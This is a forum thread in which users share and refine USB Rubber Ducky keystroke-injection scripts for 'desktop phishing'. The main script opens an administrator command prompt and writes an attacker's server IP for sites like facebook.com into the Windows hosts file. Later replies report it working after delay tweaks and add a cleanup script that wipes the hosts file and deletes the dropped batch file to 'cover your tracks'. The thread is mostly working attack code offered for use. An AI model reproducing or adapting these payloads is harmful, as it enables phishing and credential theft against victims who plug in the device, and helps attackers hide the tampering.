KoryusaiKun Posted October 22, 2011 Posted October 22, 2011 Hi everyone, This is my first post and first script for the rubber duck. I have not yet tested this script as i am still waiting to recive it here in the UK. I got it from when i was talking to my friend about something he called desktop phishing it basicly replaces say facebooks or anyother sites ip with your chosen server's ip in the host file. Anyway heres the script: REM Author: .:Koryusai-Kun:. REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows REM Description: so when the user types into there web browser for example www.facebook.com it REM Description: insted of going to the proper ip it gose to the one in the host file your evil one. REM Description: you need to add the www. version and with out it as well. REM ---[Start CMD as administrator]----------------------- GUI DELAY 50 STRING cmd DELAY 150 MENU DELAY 75 STRING a Enter DELAY 200 LEFT ENTER STRING cls ENTER REM ---[END]---------------------------------------------- DELAY 300 REM ---[Inject into the host file]------------------------ STRING copy con inject.bat ENTER STRING SET NEWLINE=^& echo. ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER CONTROL z ENTER STRING inject.bat ENTER REM ---[END]---------------------------------------------- DELAY 200 STRING exit ENTER Quote
Sl1m Posted October 22, 2011 Posted October 22, 2011 (edited) sounds awesome ! anyone tried this? where do you replace the bogus IP and website? Edited October 22, 2011 by Sl1m Quote
KoryusaiKun Posted October 22, 2011 Author Posted October 22, 2011 You replace [WEBSITE_ADDRESS] with the website like www.facebook.com and the second with facebook.com then you put the evil server ip where [EVIL_SERVER_IP] is heres an example: ... REM ---[END]---------------------------------------------- DELAY 300 REM ---[Inject into the host file]------------------------ STRING copy con inject.bat ENTER STRING SET NEWLINE=^& echo. ENTER ENTER STRING FIND /C /I "www.facebook.com" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 www.facebook.com>>%WINDIR%\system32\drivers\etc\hosts ENTER ENTER STRING FIND /C /I "facebook.com" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^127.0.0.1 facebook.com>>%WINDIR%\system32\drivers\etc\hosts ENTER CONTROL z ENTER STRING inject.bat ENTER REM ---[END]---------------------------------------------- ... Quote
Sl1m Posted October 22, 2011 Posted October 22, 2011 thank you!! i will try it when i get home later :) Quote
KoryusaiKun Posted October 22, 2011 Author Posted October 22, 2011 No problem mate, hope it works Quote
Sl1m Posted October 26, 2011 Posted October 26, 2011 how do you reverse it if you wanna reset the default settings?(meaning you wanna direct to user to the real page ) thanks Quote
devenv Posted October 27, 2011 Posted October 27, 2011 how do you reverse it if you wanna reset the default settings?(meaning you wanna direct to user to the real page ) thanks xcopy the original file first before you edit it to host.backup. After you're done you can replace the hacked file with the original. Quote
skimpniff Posted February 19, 2012 Posted February 19, 2012 (edited) Hi everyone, This is my first post and first script for the rubber duck. I have not yet tested this script as i am still waiting to recive it here in the UK. I got it from when i was talking to my friend about something he called desktop phishing it basicly replaces say facebooks or anyother sites ip with your chosen server's ip in the host file. Anyway heres the script: REM Author: .:Koryusai-Kun:. REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows REM Description: so when the user types into there web browser for example www.facebook.com it REM Description: insted of going to the proper ip it gose to the one in the host file your evil one. REM Description: you need to add the www. version and with out it as well. REM ---[Start CMD as administrator]----------------------- GUI DELAY 50 STRING cmd DELAY 150 MENU DELAY 75 STRING a Enter DELAY 200 LEFT ENTER STRING cls ENTER REM ---[END]---------------------------------------------- DELAY 300 REM ---[Inject into the host file]------------------------ STRING copy con inject.bat ENTER STRING SET NEWLINE=^& echo. ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER CONTROL z ENTER STRING inject.bat ENTER REM ---[END]---------------------------------------------- DELAY 200 STRING exit ENTER I've not been able to get this to successfully execute. Can anyone confirm it's successful operation? I tweaked the delays and it works like a charm. My next project related to this is a quick edit to this that will include the commands necessary (replying "yes") to overwrite the existing hosts file. For those not familiar, if you successfully execute this command and try to run it again, you are prompted with a command line prompt asking for permission to overwrite the existing file. As soon as I have it tested and working, I'll post it. I went a simpler route, see the following post. Edited February 28, 2012 by skimpniff Quote
skimpniff Posted February 28, 2012 Posted February 28, 2012 (edited) Hi everyone, This is my first post and first script for the rubber duck. I have not yet tested this script as i am still waiting to recive it here in the UK. I got it from when i was talking to my friend about something he called desktop phishing it basicly replaces say facebooks or anyother sites ip with your chosen server's ip in the host file. Anyway heres the script: REM Author: .:Koryusai-Kun:. REM Description: Used for phishing, it add's an ip of your choosing to the hosts file on windows REM Description: so when the user types into there web browser for example www.facebook.com it REM Description: insted of going to the proper ip it gose to the one in the host file your evil one. REM Description: you need to add the www. version and with out it as well. REM ---[Start CMD as administrator]----------------------- GUI DELAY 50 STRING cmd DELAY 150 MENU DELAY 75 STRING a Enter DELAY 200 LEFT ENTER STRING cls ENTER REM ---[END]---------------------------------------------- DELAY 300 REM ---[Inject into the host file]------------------------ STRING copy con inject.bat ENTER STRING SET NEWLINE=^& echo. ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER ENTER STRING FIND /C /I "[WEBSITE_ADDRESS]" %WINDIR%\system32\drivers\etc\hosts ENTER STRING IF %ERRORLEVEL% NEQ 0 ECHO %NEWLINE%^[EVIL_SERVER_IP] [WEBSITE_ADDRESS]>>%WINDIR%\system32\drivers\etc\hosts ENTER CONTROL z ENTER STRING inject.bat ENTER REM ---[END]---------------------------------------------- DELAY 200 STRING exit ENTER Here is a cleanup script. Very simple for if you want to reset the hosts file to empty to cover your tracks. REM Author: skimpniff REM Description: Clean up by resetting the hosts file back to empty and deleting the inject.bat file ESCAPE CONTROL ESCAPE DELAY 600 STRING cmd DELAY 1000 MENU DELAY 1000 STRING a DELAY 1000 LEFT DELAY 1000 ENTER DELAY 400 STRING cd drivers\etc\ DELAY 400 ENTER DELAY 400 STRING copy con hosts DELAY 400 ENTER ENTER DELAY 400 STRING All ENTER ENTER DELAY 400 CONTROL z DELAY 400 ENTER DELAY 400 STRING exit ENTER Here is a modification to add to bottom of the original that deletes the inject.bat file CONTROL z ENTER DELAY 400 STRING inject.bat ENTER DELAY 400 STRING del c:\windows\system32\inject.bat ENTER DELAY 400 STRING exit ENTER Edited February 28, 2012 by skimpniff Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.